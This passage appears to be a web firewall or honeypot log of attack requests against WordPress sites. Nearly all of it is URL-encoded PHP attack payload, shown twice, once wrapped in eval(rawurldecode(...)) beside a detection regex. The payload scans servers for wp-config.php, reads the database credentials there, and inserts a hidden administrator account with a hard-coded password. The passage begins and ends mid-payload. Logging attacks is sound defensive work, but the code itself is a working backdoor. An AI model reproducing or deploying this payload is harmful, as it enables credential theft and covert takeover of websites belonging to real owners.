20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core32\/X25519.php HTTP\/1.1\nsec-fetch-site:none\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:12640\nsec-ch-ua-mobile:?0\ncookie:4=4718f09e2a2be7b472f3efbae62d97b4; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvraLvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAuL2uyVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-ch-ua-platform:\"Windows\"\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-user:?1\n\nzv=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:07:29","213.209.159.254","POST","\/wp-includes\/html-api\/class-wp-html-token.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> etswnK:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20